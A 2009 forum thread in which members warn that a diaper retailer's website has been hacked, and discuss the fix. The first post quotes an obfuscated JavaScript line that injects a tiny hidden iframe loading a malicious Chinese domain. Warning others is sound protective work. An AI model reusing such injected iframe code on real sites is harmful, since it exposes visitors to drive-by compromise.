Page 1 of 3 123 LastLast
Results 1 to 10 of 22

Thread: Dry247.com compromised

  1. #1

    Thumbs down Dry247.com compromised

    Just a quick FYI to everyone - dry247.com, makers & sellers of my favorite diaper, seems to have been hacked. Site still functions, but stopbadware.org has found that the site has embedded malicious code.

    Things like:

    Code:
    document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');
    That's a quick snipped from their page source. It's an embedded inline frame 1 pixel wide by 2 pixels high that loads up a chinese attack site (there's a couple other sites it embeds, but I didn't feel like posting them), so avoid them. I haven't done any more poking around than just looking at their page source (haven't even checked on what it's downloading from microsotf.cn - no, that's not a type-o), but it's possible that their server is infected and intercepting credit card data as well.

    I'll be checking on this every so often, but you can see updated results from stopbadware.org yourself here: Stopbadware.org - Report for www.dry247.com

    Do not - repeat, DO NOT - visit dry247.com for any reason. If you absolutely have to, please use firefox and the noscript addon and deny script permission to dry247.com until they fix this problem. That will protect your computer from being compromised as well. Under no circumstances should you buy from their website, since nothing you do can protect you from that if their transaction system is indeed compromised. If you are desperate and have to buy some, their contact info is (copy & pasted from their website)

    [email protected]

    1-888-dry-247-8
    (1-888-379-2478)

    Dry Care
    1425 37th street
    Suite 613
    Brooklyn, NY, 11218

    This makes me sad, since they make my favorite diaper and was going to buy a case. I can wait a couple days while they clear this up, though.


    **EDIT**
    Thanks to Technologic:
    Google Safe Browsing diagnostic page for www.dry247.com < a link to the Google diagnostic page for Dry24/7's page. I should have posted this in the first place, thanks for catching it Technologic )

    I've sent an email to them just to make sure they know.

    **EDIT, Jul 28th 2009**

    Their site is still down, no update as of yet as to when it will be back up. Why is it so few companies ever consider security or disaster recovery until it's too late?
    Last edited by bgi39jsjw0ggg; 28-Jul-2009 at 07:23.

  2. #2

    Default

    OMG!!! I need some... I am running low here soon. You think if they know about this... they would put up underconstruction or something. Yikes!!!


    EDIT PART:

    Thank you so much for bringing this too out attention.
    Last edited by diaperedwolfcub; 15-Jul-2009 at 01:30. Reason: Add more:

  3. #3

    Default

    Just for the hell of it I visited the site just to see what happens. But first of all I am on a VM so if anything happened i just delete the VM no big deal. I used chrome to get to it and of course it picked up on the fact that the site was infected. It gave me the option to see a google diagnostic of the page. If you are interested, The Diagnostic Page
    Just if anyone wanted to see that. It about the site that tries to load up after you visit dry24/7 website.

  4. #4

  5. #5

    Default

    If you still want to use the site, install the firefox NoScript extension. It won't allow any scripts like that from getting through without your knowledge. But more to the point, it is good that you people caught wind of a threat before it could do any real damage.

  6. #6

    Default

    Got a response from the Dry24/7 people today. They are aware of the problem now and they are working on a fix. They aren't sure how long it will take (a couple days?), and they say there is a possibility that they'll shut down the site for the time being.

  7. #7
    Darkfinn

    Default

    This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.

  8. #8

    Default



    Quote Originally Posted by Darkfinn View Post
    This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.
    I don't think this is something they chose to do. I know they added popups but this is code that when you access their site it tries to force you onto a malicious website.

  9. #9

    Default



    Quote Originally Posted by Darkfinn View Post
    This has been going on for some time... I think it is a misidentified code. They have added a popup advertising system to their site... to generate extra revenue I guess... I think it is being wrongly identified as malicious.
    Yeah, this isn't just popups. The javascript obfuscation clearly embeds hidden frames that open up known-malicious web pages, and the Dry 24/7 people themselves told me that they're investigating the problem. They describe their site as "victimized" and are trying to repair the problem.

  10. #10

    Default

    I think before there was an issue with the site being misclassified by Avast! as malicious, but that was solved a while ago. This is something new nasty. Thanks for pointing it out!
    Last edited by chevre; 16-Jul-2009 at 00:31.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
ADISC.org - the Adult Baby / Diaper Lover / Incontinence Support Community.
ADISC.org is designed to be viewed in Firefox, with a resolution of at least 1280 x 1024.